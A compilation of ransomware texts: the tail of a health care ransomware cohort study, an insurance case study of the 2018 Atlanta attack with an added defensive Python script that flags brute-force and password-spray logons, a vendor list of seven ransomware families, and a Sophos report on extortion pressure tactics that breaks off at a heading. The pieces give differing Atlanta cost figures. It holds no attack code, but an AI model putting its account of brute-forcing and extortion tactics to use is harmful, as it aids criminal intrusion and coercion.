This study had several limitations. First, we likely omitted some ransomware attacks on health care delivery organizations. However, we believe that our database is the most comprehensive accounting of major health care ransomware attacks available for the period between 2016 and 2021. To be missing from the THREAT database, a ransomware attack would have needed to go unreported to HHS OCR, remain undetected by HackNotice web crawler surveillance and monitoring of dark web forums, and have received no press coverage in local news or health care trade publications. We believe this is most likely for ransomware attacks on smaller organizations, organizations in small geographic jurisdictions and/or organizations in states without mandated disclosure of data breaches, organizations without a hospital, and in scenarios in which the organization paid the demanded ransom quickly. The more likely scenario for omission of a ransomware attack from the THREAT database is misclassification. Events may have been ransomware attacks but only contained mention of malware or cyberattack, without discussion of any payment demand. To avoid false positives, these would not have been included in the THREAT database. Further research, including additional data sources, potentially in collaboration with the relevant federal entities (ie, the FBI, HHS OCR, the Health Sector Cybersecurity Coordination Center, and the Cybersecurity and Infrastructure Security Agency), is needed to validate this study’s findings.

Second, we have no insight into attempted but unsuccessful ransomware attacks (ie, a situation in which no one clicked on the phishing email link that would have compromised the system). Thus, we cannot comment on the traits of health care delivery organizations who avoid this type of cybercrime. Third, and relatedly, we cannot attribute changes in the characteristics of ransomware attacks over time to changes in whom hackers target, the types of malware used, the market structure of health care delivery organizations (ie, as consolidation produces larger organizations, ransomware attacks are mechanically more likely to affect them), or to changes in organizational susceptibility to such cyberattacks and use of cybersecurity measures. Fourth, we likely underestimated the severity of operational disruptions and PHI exposure, as health care delivery organizations may try not to publicize these details. However, an increase in news coverage of ransomware attacks during the study period might bias us toward finding an increase in the sophistication of ransomware attacks. We noted that measures of attack sophistication and severity from multiple sources (ie, PHI exposure from the HHS OCR Data Breach Portal and operational disruptions covered by news/trade publications) yielded similar results. Fifth and finally, we could not say whether or how ransomware disruptions affect patients seeking care during an attack. Quantifying this remains a crucial area for future work.

Conclusions

The results of this cohort study suggest that from 2016 to 2021, ransomware attacks on health care delivery organizations increased in frequency and sophistication. These attacks exposed PHI and frequently disrupted health care delivery, but further research is needed to more precisely understand the operational and clinical care consequences of these disruptions. As policy makers craft legislation aimed at countering the threat of ransomware attacks across multiple industries, we urge them to focus on the specific needs of health care delivery organizations, for which operational disruptions may carry substantial implications for the quality and safety of patient care.


Cyber Case Study: City of Atlanta Ransomware Incident

by Kelli Young | Sep 20, 2021 | Case Study , Cyber Liability Insurance


In the spring of 2018, cybercriminals compromised several computer networks within Atlanta’s City Hall to launch a ransomware attack. From there, the cybercriminals restricted access to a wide range of online platforms, municipal operations and databases—requiring a significant ransom to be paid in exchange for restoration. Nevertheless, the city of Atlanta refused to reward the cybercriminals and did not pay the ransom. As a result, the city of Atlanta ransomware attack took several months to recover from, disrupting various government services for extended periods and costing millions of dollars in damage.

This incident has become known as one of the costliest cyberattacks to impact a local government, thus demonstrating the severity of ransomware threats. Upon reflection, there are a variety of cybersecurity lessons that organizations can learn by reviewing the details of this incident, its impact and the mistakes the city of Atlanta made along the way. Here’s what your organization needs to know.

The Details of the City of Atlanta Ransomware Attack


The attack compromised critical technology and information across Atlanta, interrupting key municipal functions within several city departments. In particular, the incident disrupted online payment programs for various services (e.g., utilities, traffic tickets and business licenses or renewals) and a multitude of law enforcement operations, including warrant issuances, inmate processing protocols and court fee payments. Further, the Atlanta Police Department lost access to practically all of its archived in-vehicle video footage and even had to temporarily resort to writing incident reports by hand.

As part of the ransomware attack, the cyber-criminals demanded the payment of over $50,000 in bitcoin before restoring any technology or information for the Atlanta government. However, the city refused to comply with the cybercriminals’ demands; government officials did not want to reward the cybercriminals’ behavior with payment, nor were they convinced that such a payment would result in restoration.

By not paying the ransom, the city was forced to recover from the attack on their own accord in the coming days, weeks and months. It took five days for the Atlanta government to regain access to critical technology. To prevent further cyber-related damages, the city kept the Wi-Fi at the Hartsfield-Jackson Atlanta International Airport disabled for 10 days following the incident until April 2. The government wasn’t able to restore its online payment programs until May, while local law enforcement couldn’t fully resume digital operations until June.

The Impact of the City of Atlanta Ransomware Attack

Following this large-scale ransomware attack, the Atlanta government encountered many consequences, including the following:

Disruption concerns First, the incident interrupted many key functions within the Atlanta government, especially payment platforms and law enforcement services. Although the city was fortunate enough to maintain control of emergency response operations (e.g., 911 dispatch) and essential community offerings (e.g., water and electricity) throughout the attack, the disrupted municipal services still caused issues for both government employees and Atlanta residents. What’s worse, many of these interruptions continued for extended periods as the city recovered from the incident, thus compounding concerns. While the Atlanta government made the right decision in not paying the ransom during this attack, it’s important to note that refusing to pay, without tested backups and a rehearsed recovery plan to fall back on, can lead to a prolonged incident recovery process.

Recovery expenses Next, the costs associated with recovering from the attack were severe. In total, the incident is estimated to have cost both the city and its taxpayers nearly $17 million. Breaking down these recovery expenses, the Atlanta government spent approximately $6 million in its initial response to the attack. This amount includes developing emergency contracts for assistance with recovering compromised technology; hiring a forensics team to investigate the incident further; consulting crisis communications specialists; and implementing necessary security upgrades. The remaining $11 million was spent repairing or replacing damaged government systems and technology, including desktops, laptops and smart devices. Additionally, certain information across law enforcement databases was permanently destroyed during the attack, representing an irreparable loss.

Reputational damage Lastly, the Atlanta government faced widespread scrutiny for its outdated cyber infrastructure after the incident. Some IT experts blamed the city’s security failures for contributing to the severity of the attack. In fact, an audit performed just two months prior to the incident identified between 1,500 and 2,000 vulnerabilities within the Atlanta government’s digital operations and technology, suggesting the city had become complacent regarding cybersecurity.

Lessons Learned from the City of Atlanta Ransomware Attack

There are several cybersecurity takeaways from the City of Atlanta ransomware attack. Specifically, the incident emphasized these important lessons:

Effective access controls are critical. Because this incident originally stemmed from brute-force methods, in which attackers guess credentials for exposed remote access services until one works, understanding how to defend against such tactics is crucial. Specifically, if the Atlanta government had had more stringent access controls in place when the attack occurred, the cybercriminals may have been stopped before they could infiltrate government networks and launch the ransomware. After all, it’s much harder for cybercriminals to guess passwords and obtain access to networks when credentials are protected by strict security controls, when repeated failed logons are rate-limited or lock the account, and when those failures are monitored. Valuable access control tactics include the following:

  • Instructing employees to use long, unique passwords or passphrases for their accounts, screening them against lists of known-breached passwords, and requiring a change when a credential is known or suspected to be compromised (current guidance such as NIST SP 800-63B no longer recommends routine scheduled rotation, which tends to produce predictable variations of the old password)
  • Implementing multifactor authentication that requires employees to verify their identities with factors of different kinds (e.g., a password plus a one-time code from an authenticator app or a hardware security key; a security question is just a second password and adds little), especially for remote access such as RDP or VPN
  • Limiting employees’ digital access solely to the technology, networks and data they need to perform their job responsibilities
  • Segmenting different workplace networks to prevent all networks from being compromised if a single employee’s credentials are exploited
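The monitoring side of the first lesson, as an added example that is not part of the CoverLink article: the script below replays a constructed, simplified rendering of Windows Security logon events (4625 = failed logon, 4624 = successful logon, logon type 10 = RDP; the one-line field format is an assumption of this example, not the real event schema) and flags a successful logon that follows a burst of failures from the same source address. It also distinguishes a single-account brute force from a password spray across many accounts, since the two call for different responses (lockout versus rate limiting and MFA).

```python
"""Detect a successful logon that follows a burst of failures from one source.

Added example, not code from the original page. Input is a constructed,
simplified rendering of Windows Security events; real events carry these
fields under names such as "Source Network Address" and "Logon Type".
"""
import re
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample log (an assumption of this example, not real Atlanta data).
# 203.0.113.7 hammers one account over RDP and gets in; 198.51.100.5 is a user
# who mistypes a password twice; 192.0.2.9 sprays one guess across many accounts.
SAMPLE_LOG = """\
2018-03-22T02:10:01Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:03Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:05Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:07Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:09Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:11Z EventID=4625 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T02:10:13Z EventID=4624 Account=Administrator Source=203.0.113.7 LogonType=10
2018-03-22T08:00:00Z EventID=4625 Account=jdoe Source=198.51.100.5 LogonType=10
2018-03-22T08:00:20Z EventID=4625 Account=jdoe Source=198.51.100.5 LogonType=10
2018-03-22T08:00:40Z EventID=4624 Account=jdoe Source=198.51.100.5 LogonType=10
2018-03-22T09:00:00Z EventID=4625 Account=alice Source=192.0.2.9 LogonType=3
2018-03-22T09:00:01Z EventID=4625 Account=bob Source=192.0.2.9 LogonType=3
2018-03-22T09:00:02Z EventID=4625 Account=carol Source=192.0.2.9 LogonType=3
2018-03-22T09:00:03Z EventID=4625 Account=dave Source=192.0.2.9 LogonType=3
2018-03-22T09:00:04Z EventID=4625 Account=erin Source=192.0.2.9 LogonType=3
2018-03-22T09:00:05Z EventID=4624 Account=erin Source=192.0.2.9 LogonType=3
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) Account=(?P<user>\S+) "
    r"Source=(?P<src>\S+) LogonType=(?P<ltype>\d+)$"
)


@dataclass(frozen=True)
class LogonEvent:
    ts: datetime
    event_id: int
    user: str
    src_ip: str
    logon_type: int


@dataclass(frozen=True)
class Alert:
    src_ip: str
    user: str            # account that finally logged on
    ts: datetime
    failures: int        # failed logons from this source inside the window
    distinct_accounts: int
    kind: str            # "brute force" (one account) or "password spray" (many)


def parse_log(text):
    """Parse the simplified log format; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append(LogonEvent(
            ts=datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            event_id=int(m["eid"]),
            user=m["user"].lower(),   # Windows account names are case-insensitive
            src_ip=m["src"],
            logon_type=int(m["ltype"]),
        ))
    return events


def find_bruteforce_successes(events, threshold=5, window=timedelta(minutes=10)):
    """Return an Alert for each 4624 preceded by >= threshold 4625s from the same
    source address within `window`. Failures are kept per source in a sliding
    window, so this is a single pass over the time-ordered events."""
    recent = defaultdict(deque)   # src_ip -> deque of (ts, account) failures
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        q = recent[ev.src_ip]
        while q and ev.ts - q[0][0] > window:   # drop failures outside the window
            q.popleft()
        if ev.event_id == 4625:
            q.append((ev.ts, ev.user))
        elif ev.event_id == 4624 and len(q) >= threshold:
            accounts = {user for _, user in q}
            alerts.append(Alert(
                src_ip=ev.src_ip, user=ev.user, ts=ev.ts, failures=len(q),
                distinct_accounts=len(accounts),
                kind="password spray" if len(accounts) > 1 else "brute force",
            ))
            q.clear()   # one alert per burst
    return alerts


if __name__ == "__main__":
    for a in find_bruteforce_successes(parse_log(SAMPLE_LOG)):
        print(f"{a.ts:%Y-%m-%d %H:%M:%S} {a.kind}: {a.src_ip} logged on as "
              f"{a.user} after {a.failures} failures across "
              f"{a.distinct_accounts} account(s)")
```

The two sample bursts produce one alert each; the user who mistypes twice does not. In practice the same logic runs in a SIEM over events forwarded from domain controllers and RDP hosts, and a hit from an internet-facing address is the signal to isolate that host and reset the account, since the attacker is already inside at that point. Detection complements, but does not replace, lockout thresholds, MFA and keeping RDP off the public internet.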

Security software is worth it. In addition to proper access controls, a wide range of security software could have helped the Atlanta government detect, mitigate and potentially prevent this attack. Although this software may seem like an expensive investment, it’s well worth it to avoid devastating cyber incidents. Essential security software to consider includes network monitoring systems, data backup and encryption services, antivirus programs, endpoint detection products and patch management tools. This software should be utilized on all workplace technology and updated regularly.

Cyber incident response plans are necessary. If the city had been prepared to respond to this incident, the recovery process likely could have been much faster and, subsequently, far less expensive than it was. Instead, the Atlanta government took several months to fully recover from this incident, ultimately increasing disruption concerns and compounding the overall costs of the attack. Such extended recovery issues emphasize how essential it is to have an effective cyber incident response plan in place. This type of plan can help an organization establish timely response protocols for remaining operational and mitigating losses in the event of a cyber event. A successful incident response plan should outline potential cyberattack scenarios, methods for maintaining key functions during these scenarios and the individuals responsible for doing so. It should be routinely reviewed through various activities—such as penetration testing and tabletop exercises—to ensure effectiveness and identify ongoing security gaps. Based on the results from these activities, the plan should be adjusted as needed.

Proper coverage can offer vital protection. Finally, this attack made it clear that no organization—not even a local government—is immune to cyberattacks and subsequent losses. What’s more, these events are increasing in both cost and frequency. That’s why it’s crucial to ensure adequate protection against cyber-related losses by securing proper coverage. Make sure your organization works with a trusted insurance professional when navigating these coverage decisions.


7 real and famous cases of ransomware attacks

  • Updated at March 19, 2021

Ransomware is a type of malware that hijacks and blocks files or systems, preventing the user from having access to them. Ransomware is a hijacker. Using encryption, it holds files and systems hostage. Theoretically, when the victim pays the ransom amount, they receive the decryption key, releasing the blocked files or systems.

We used the word “theoretically” because, in many cases, the victim pays the amount that was required and still doesn’t receive the key. By the way, it’s usually required that the ransom is paid in cryptocurrency, such as bitcoin or monero. The point is precisely to make it difficult to track the cybercriminal.

Ransomware has been terrifying individuals and, most importantly, companies for about 30 years. Worse, over time it has become a more advanced and sophisticated threat. New tactics and technologies are used, whether to evade detection solutions, to encrypt different types of files, or to convince the user to pay the ransom amount.

Both the FBI and Europol point to ransomware as one of the main threats in the digital world. In fact, the European agency has described ransomware as a key cybercrime threat for years. The FBI’s Internet Crime Complaint Center (IC3) received 2,474 complaints identified as ransomware in 2020, with adjusted losses of more than USD 29 million (a figure that covers only incidents reported to the FBI, so it understates the global total).

The examples of ransomware attacks listed below show you how these attacks can work, giving an idea of the damage that ransomware does to companies and people. In this article, we cover seven examples, from the most recent to the oldest: Ryuk, SamSam, WannaCry, Petya, TeslaCrypt, CryptoLocker and the AIDS Trojan.

Check out 7 examples of ransomware attacks

1. Ryuk, 2019 and 2020

Like most infections caused by ransomware, Ryuk is spread mainly via malicious emails , or phishing emails, containing dangerous links and attachments . The ransom amount to be paid to release an entire system can exceed USD 300,000, making Ryuk one of the most expensive ransomware in history, well above the average.

According to the FBI, Ryuk’s attacks have already caused more than USD 60 million in damage worldwide since this type of ransomware gained prominence in 2018 after stopping the operations of major newspapers in the United States. More than 100 companies suffered attacks.

In 2020, for example, EMCOR Group (engineering and industrial construction company) and Epiq Global (legal services company) suffered incidents involving Ryuk.

An interesting fact is that Ryuk’s ransom notes contain contact emails ending in @protonmail.com or @tutanota.com. The victim needs to send a message to find out how much they must pay for the decryption key.

2. SamSam, 2018

SamSam ransomware was identified a few years ago, more precisely in late 2015. But it was in 2018 that it gained much more prominence after infecting the city of Atlanta, the Colorado Department of Transportation and the Port of San Diego, in the U.S., abruptly stopping services.

In the same year, two Iranian nationals were indicted in the U.S. for using SamSam against more than 200 organizations and companies in the U.S. and Canada, including hospitals, municipalities and public institutions. The attacks are estimated to have caused losses of more than USD 30 million.

The city of Atlanta alone spent more than USD 2 million to repair the damage. Hancock Health, an Indiana hospital, paid a ransom of USD 55,000. To gain entry, the SamSam operators typically targeted weakly secured, internet-exposed Remote Desktop Protocol (RDP) and File Transfer Protocol (FTP) services, brute-forcing credentials rather than relying on malicious email.

A curious fact about SamSam is that the victim is asked to make a first payment for a first key, which would unlock only a few machines. It would be like a sign of honesty.

“With buying the first key you will find that we are honest”, says the ransomware message. Would you believe that?


3. WannaCry, 2017

One of the most devastating ransomware attacks in history in terms of loss volume was caused by WannaCry, launched in 2017. The estimated value at the time was USD 4 billion in losses. The amount required to release each machine was around USD 300.

WannaCry did not need phishing emails to spread: it was a self-propagating worm that exploited a vulnerability in the SMBv1 file-sharing service of unpatched Windows systems (the EternalBlue exploit, for a flaw Microsoft had already patched in March 2017 as MS17-010). Worldwide, more than 200,000 systems were affected, at organizations such as FedEx, Telefónica, Nissan and Renault.

By the way, even today there are phishing emails claiming that you were infected by WannaCry, demanding ransom payment. But they’re plain emails, with no files. Pay attention!

4. Petya, 2016, and NotPetya, 2017

Petya is a ransomware family that started to be propagated in 2016, via emails with malicious attachments. A destructive 2017 variant known as NotPetya, which reused Petya’s code but spread through a compromised software update and the same SMB exploit as WannaCry, is estimated to have caused more than USD 10 billion in financial losses.

Petya acts by infecting the master boot record of machines that use the Windows system and encrypting the file system’s master file table. That is, it blocks the entire operating system rather than individual files. To unlock, the victim was asked to pay a ransom of around USD 300. NotPetya displayed a similar ransom note, but its encryption could not be reversed even by its authors, so paying was pointless.

The NotPetya outbreak affected different organizations in the world, such as banks and companies in the areas of transportation, oil, food and health. Let us cite as an example the National Bank of Ukraine, Mondelez (food company), Merck (pharmaceutical company) and Rosneft (oil company).

5. TeslaCrypt, 2015

Like other types of ransomware, TeslaCrypt has several versions. But the attacks of this one became famous because, in the beginning, it infected game files, blocking maps and user profiles, for example. We’re talking about games like Call of Duty, Minecraft and Warcraft.

The evolved versions of TeslaCrypt were able to encrypt other files, such as PDF and Word, for example.

In any case, the victim was forced to pay at least USD 250 to release the files. But there are cases where the hijacker required USD 500 per machine.

6. CryptoLocker, 2013

The CryptoLocker ransomware has been added to our list because it was a milestone for its time. When it was launched in 2013, CryptoLocker used 2048-bit RSA public-key encryption to lock the per-file keys, with the private key held only on the attackers’ servers, which left cybersecurity experts with no practical way to recover files without it.

This type of ransomware is believed to have caused losses of more than USD 3 million, infecting more than 200 thousand Windows-based computers. CryptoLocker was distributed mainly via email, using malicious files.

7. AIDS Trojan or PC Cyborg, 1989

AIDS Trojan, also known as PC Cyborg, is the first registered ransomware in history. That is why its creator, Joseph Popp, a Harvard-trained biologist, can be considered the father of ransomware.

AIDS Trojan was distributed using infected floppy disks. They were sent to participants at the World Health Organization’s international AIDS conference, in Stockholm, Sweden, in 1989.

After hiding file directories and encrypting file names, this type of ransomware asked the victim to send USD 189 to a post office box in Panama. Only then, supposedly, could the data be recovered. But since it used only weak symmetric encryption, the damage was easily reversed and free recovery tools were soon available.


Ransomware fighting project: No More Ransom

Have you heard of the No More Ransom (NMR) project? This is a worldwide initiative by Europol and several government agencies and cybersecurity companies to fight ransomware . Gatefy is a partner of the project.

No More Ransom helps victims of infections caused by ransomware to recover blocked data without having to pay the ransom amount. For more information, visit nomoreransom.org .

Email is the primary vector for ransomware attacks: invest in protection

In the case of a ransomware intrusion, the recommendation is not to pay the requested ransom. As seen in most of the cases and examples of ransomware attacks that we presented, the most common form of ransomware delivery is email, though not the only one. In fact, email is the platform most used by cybercriminals to commit fraud and scams.

To solve this security problem, Gatefy has an email gateway solution that protects companies of all sizes against various types of threats, including ransomware , malware , phishing and BEC (Business Email Compromise) . It’s based on artificial intelligence and machine learning . And it’s compatible with several email providers, such as Office 365 , G Suite , Exchange , and Zimbra .

We also offer a DMARC-based anti-fraud solution , so that you have control and visibility over the use of your business’s domain.


Turning the screws: The pressure tactics of ransomware gangs

Back in 2021, Sophos X-Ops published an article on the top ten ways ransomware operators ramp up pressure on their targets, in an attempt to get them to pay. Last year, X-Ops revealed that threat actors have since developed a symbiotic relationship with sections of the media , leveraging news articles as extortion pressure. Three years on, threat actors continue to adapt and change their tactics to increase leverage against their targets.

The methods we described in the 2021 article – such as threats to publish data, calling employees, and notifying customers and the media about breaches – are all still in use today. However, ransomware gangs are adopting some new, and concerning, tactics.

A brief summary of our findings:

  • Ransomware operators increasingly weaponize legitimate entities – such as the news media, legislation, civil regulatory enforcement authorities, and even law enforcement – to ramp up pressure on victims
  • In some cases, criminals encourage affected customers and employees to claim compensation, or launch litigation – sometimes providing the names and contact details of CEOs and business owners
  • Threat actors claim to assess stolen data for evidence of illegal activity , regulatory noncompliance, and financial discrepancies – all of which can be used as further leverage and to inflict reputational damage
  • Ransomware criminals openly criticize their victims , and will sometimes attempt to deride them as unethical or negligent, which can also cause reputational damage – as well as contributing to some threat actor groups’ attempts to ‘flip the script’ and portray themselves as beneficent vigilantes
  • Ransomware operators appear to be increasingly comfortable with stealing and leaking extremely sensitive data , including medical records, nude images, and, in one case (as we’ll cover later), the personal details of a CEO’s daughter

Legislation and litigation

Something we didn’t see much, if any of, in 2021 was ransomware actors weaponizing legislation, or encouraging secondary victims of their attacks – such as clients, customers, and employees – to launch lawsuits, in order to increase pressure on targeted organizations. However, we’ve seen several recent examples of this.

In November 2023, ALPHV/BlackCat filed a Securities and Exchange Commission (SEC) complaint against one of its own victims. The threat actor alleged that the company had failed to notify the SEC of the breach within the four business days required under the SEC’s new cybersecurity disclosure rules (which, while adopted in July 2023, did not actually come into force until December of that year, so the obligation did not yet apply).

We saw threats to expose non-compliance in other contexts, too. In some cases, it’s something for which threat actors appear to be specifically searching. As we reported in our December 2023 piece on the relationship between ransomware gangs and the media , at least one threat actor appears to be actively recruiting for people to look for instances of non-compliance and financial irregularities – possibly to use this as leverage for extortion.


Figure 1: A threat actor posts a recruitment ad on a criminal forum, seeking someone to look for “violations,” “inappropriate spending,” “discrepancies,” and “cooperation with companies on sanction lists.” It’s not clear that this is linked specifically to ransomware

It’s worth noting that this sort of activity can require considerable expertise – as noted by one threat actor on a criminal forum below (Figure 2) – but is likely still attractive to ransomware operators if it provides them with more ammunition.


Figure 2: A threat actor provides some advice on finding “inconsistencies in tax reporting” on a criminal forum

At least one other ransomware group claims to do this type of research. The WereWolves threat actor notes, on its leak site, that it subjects stolen data to “a criminal legal assessment, a commercial assessment and an assessment in terms of insider information for competitors.”


Figure 3: An excerpt from the WereWolves ransomware leak site

We noted one particularly disturbing example, where the Monti ransomware gang claimed that an employee at a compromised organization had been searching for child sexual abuse material. The threat actor posted a screenshot of a browser history window, along with a PowerShell window showing the alleged username of the offender. Monti went on to state that “if they don’t pay up, we’ll be forced to turn over the abuse information to the authorities, and release the rest of the information to the public.”


Figure 4: Part of a post on the Monti ransomware leak site

We also noted an instance of a threat actor encouraging people whose personally identifiable information (PII) appeared in a data breach to “partake in litigation against the victim.” Moreover, the threat actor also provided a “snippet of the negotiations” and encouraged those affected to “express your concerns” to an executive at the targeted organization – providing not just that individual’s name, but also their telephone number.


Figure 5: A threat actor posts on a criminal forum, providing material for “those who wish to partake in litigation against the victim”

This tactic of naming specific individuals – along with contact details – is used by more than one ransomware gang. The Qiulong group, for example, regularly includes the details of CEOs and business owners on its leak site, often accompanied by insults, personal information, and accusations of negligence.

A screenshot from a ransomware leak site

Figure 6: A post on the Qiulong ransomware leak site. Note the reference (redacted in the image above) to a specific make of car the CEO drives

Similarly, the Snatch threat actor regularly names specific individuals as “responsible” for data breaches.

A screenshot from a ransomware leak site

Figure 7: A post on the Snatch leak site, which names a specific individual who Snatch claims is “responsible for data leakage”

A screenshot from a ransomware leak site

Figure 8: The Snatch threat actor explains its reasoning for including the personal data of business owners and authority figures on its leak site

In one case, we noted that the Monti ransomware group had not just named a business owner and published their Social Security number, but had also posted an image of them, crudely edited to include devil horns and a speech bubble reading “I’m a dumb p***y who doesn’t care about my clients.”

From the perspective of ransomware operators, referring to specific individuals serves three purposes. First, it provides a ‘lightning rod’ for any subsequent blame, pressure, and/or litigation. Second, it contributes to the threat of reputational damage (covered in the next section). And third, personal attacks can menace and intimidate the leadership of the targeted organization.

It may seem somewhat ironic that threat actors are weaponizing legislation to achieve their own illegal objectives, and the extent to which this tactic has been successful is unclear. However, when used, it likely adds to the already considerable pressure experienced by C-suite executives – particularly in the context of at least one CEO previously being convicted following legal action related to a ransomware attack. While out of scope for this particular article, it’s worth noting that the current legal landscape pertaining to the personal risk and accountability of CEOs and CISOs in such situations appears uncertain. While we’re not aware of any convictions arising from ransomware groups referring breach information to regulators or law enforcement, that doesn’t mean it won’t happen in the future – and the possibility is likely to be of concern to C-suites.

Moreover, the fact that some ransomware operators claim to take a vigilante role to expose wrongdoing, irregularities, and criminal activity within organizations presents an interesting ethical issue, despite the irony that doing so supports their own criminal activity.

Ethics, reputational damage, and embarrassment

In Figure 4 above, the Monti ransomware group claimed to expose (and threatened to report) serious criminal activity allegedly occurring at an organization. While this in no way negates the illegality and seriousness of ransomware attacks, it raises an ethical dilemma: which is worse, the ransomware attack itself, or the attackers’ revelation of potentially criminal activity taking place within the organization that was victimized?

Many ransomware criminals thrive in this ethical grey area, and want to appear moral, ethical, or genuinely concerned about security and confidentiality. As we noted in our previous article on this topic, numerous ransomware gangs are attempting to ‘flip the script’ and portray themselves as a force for good, by referring to themselves as “honest…pentesters”, or as a “penetration testing service” conducting “cybersecurity [studies]” or “security audit[s].” Of course, legitimate penetration testers operate with the prior permission of, and under parameters set by (and sometimes, active supervision by) the companies who hire them; ransomware criminals do not.

Cactus, for instance, describes itself as a “Direct Security Audit Agency (DSAA) revolutionizing a customer journey, one hyper-targeted solution at a time.” The language here is – probably intentionally – reminiscent of corporate marketing material.

A screenshot from a ransomware leak site

Figure 9: On the FAQ page on its leak site, the Cactus ransomware group claims that it conducts “network security audits”

In contrast, many ransomware gangs refer to their targets as “irresponsible,” “negligent,” or uncaring.

A screenshot from a ransomware leak site

Figure 10: The 8Base leak site mentions “irresponsible processing of…personal data and business secrets” and includes the statement that “we are sorry that you were affected by companies’ negligent attitude to the privacy and security of their customers’ personal data.” Note the claim that this “gives you the opportunity to request compensation”

Of particular interest in Figure 10 is 8Base’s promise that they will “remove personal information from disclosure on demand…at no cost to you,” following requests from individual clients of the targeted organization.

Again, this is (perhaps) an attempt to make the group appear reasonable and ethical, but it’s also combined with a pressure tactic aimed at the organization. In the same paragraph, 8Base notes that “in addition we will provide your data set that you can use in a lawsuit to compensate the damage caused to you.”

A screenshot from a ransomware leak site

Figure 11: In a post on its leak site, the Blacksuit ransomware group claims that the management of a targeted organization “does not care about you or your personal information”

A screenshot from a ransomware leak site

Figure 12: A screenshot of the Space Bears leak site, asking visitors whether they trust targeted companies with their data

In many cases, this criticism continues after negotiations have broken down and victims have decided not to pay. For instance, the Karakurt group, in a ‘press release,’ called out a hospital after it failed to pay a ransom.

A screenshot from a ransomware leak site

Figure 13: The Karakurt group criticizes a hospital after it failed to pay the ransom, calling it “dishonest and irresponsible”

Typically, in the context of exposing security weaknesses and negligence, ransomware operators portray themselves as morally superior to their targets. Occasionally, the waters are muddied further.

The Malas ransomware gang, for example, demands that its victims “make a donation to a nonprofit of their choice.”

A screenshot from a ransomware leak site

Figure 14: An excerpt from a post on the Malas ransomware gang’s leak site. The quotation in the last response is attributed to financier Warren Buffett

Other threat actors have previously adopted a similar approach. In 2022, for example, the GoodWill ransomware group demanded that victims perform charitable activities, such as feeding poor children or providing clothes and blankets to the unhoused, and post video evidence online. In 2020, the Darkside ransomware gang claimed to have donated a proportion of its gains to two charities. As far as we can tell, there were no known victims of the GoodWill ransomware strain, so we don’t know if the tactic was successful, and at least one of the two charities to which Darkside donated funds stated that it would not be keeping the money.

Malas, however, takes things a step further. In addition to requiring charitable donations, it also explicitly criticizes specific organizations on the basis of alleged ethical shortcomings – arguably combining ransomware with hacktivism.

A screenshot from a ransomware leak site

Figure 15: A post on the Malas leak site following an attack on a collection agency (a company that attempts to recover debts on behalf of creditors)

A screenshot from a ransomware leak site

Figure 16: Another post on the Malas leak site, referring to an attack on an organization in the natural resources sector

Malas admits that this approach has not been particularly successful. On its FAQ, its response to the question “Has it been effective?” is an unequivocal “So far, no.” Interestingly, the author of the FAQ claims that one of the reasons for this is that victims “won’t send money to genuine grass-roots organizations.”

A screenshot from a ransomware leak site

Figure 17: Malas goes into some detail as to why it believes its approach has not been effective

However, in attempting to present its targets as morally deficient, Malas is essentially no different to its peers. It leverages the threat of reputational damage, in the same way that other ransomware gangs do. The intent is to reduce trust and good faith, with the proposed solution being for the target to pay up and therefore negate, at least partially, any adverse impact.

Malas is also no different to its peers when it comes to its communications with victims. Like other ransomware groups, it threatens to sell or publish data and inform journalists and customers.

A screenshot from a ransomware leak site

Figure 18: An excerpt from the Malas leak site

The prevalence of this threat was something we noted both in our article on ransomware gangs and the media, and in our 2021 examination of ransomware pressure tactics. Conscious that many news outlets are keen to publish stories on ransomware, and that media attention may compound reputational damage to organizations and increase the pressure to pay up, many ransomware gangs explicitly make this threat on their leak sites, and will solicit media coverage and communication with journalists.

In addition, some threat actors also threaten to notify customers, partners, and competitors. The intent here is to generate and intensify pressure from multiple angles and sources: media attention, customers, clients, other companies, and potentially regulatory bodies too.

A screenshot from a ransomware leak site

Figure 19: An excerpt from the FAQ on the Cactus leak site. Note the threats that “it is highly likely that you will be sued,” and that “journalists, researchers, etc. will dig through your documents, finding inconsistencies or irregularities”

A screenshot from a ransomware leak site

Figure 20: An excerpt from the FAQ on the Play leak site. Note that there is some similar wording to the Cactus notice in Figure 19, in the answer to the “What happens if we don’t pay?” question

We noted in our 2021 article that the threat of leaked personal data was a big concern for organizations (and, of course, for the individuals involved), with both privacy and potential legal ramifications. While this is still the case, in recent years ransomware gangs have stepped up their game, sometimes leaking, or threatening to leak, particularly sensitive data.

Sensitive data, swatting, and more

Several ransomware groups have published sensitive medical data following attacks. This has included mental health records, the medical records of children, and, recently, blood test data.

In a world where data breaches are increasingly commonplace, threatening to leak extremely sensitive data exacerbates the pressure on victim organizations, and can cause considerable distress and concern to those affected.

In some cases, we noticed ransomware gangs explicitly calling this out on their leak site – noting that stolen data included “images of nude patients” and “information about patients’ sexual problems.”

A screenshot from a ransomware leak site

Figure 21: A post on the Qiulong leak site

A screenshot from a ransomware leak site

Figure 22: Another post on the Qiulong leak site

In one particularly concerning example, the Qiulong ransomware group posted screenshots of a CEO’s daughter’s identity documents, along with a link to her Instagram profile.

A screenshot from a ransomware leak site showing two identity cards (redacted)

Figure 23: The Qiulong ransomware group posts personal data of a CEO’s daughter on its leak site. From the limited context provided, this may have been an act of revenge after negotiations had broken down

In 2021, we noted that ransomware gangs would sometimes email and call employees and customers in order to increase pressure on organizations. However, in recent years, threat actors appear to be increasingly interested in not merely threatening organizations directly, but also secondary victims, as in Figure 23. For instance, as reported in January 2024, attackers threatened to ‘swat’ patients of a cancer hospital, and have sent threatening text messages to a CEO’s spouse.

As we wrote in 2021, ransomware operators will often warn their victims not to contact law enforcement. However, the threat of swatting demonstrates some attackers’ willingness to weaponize law enforcement when it suits them – not unlike their willingness to weaponize legislation and regulations.

An escalation in tactics

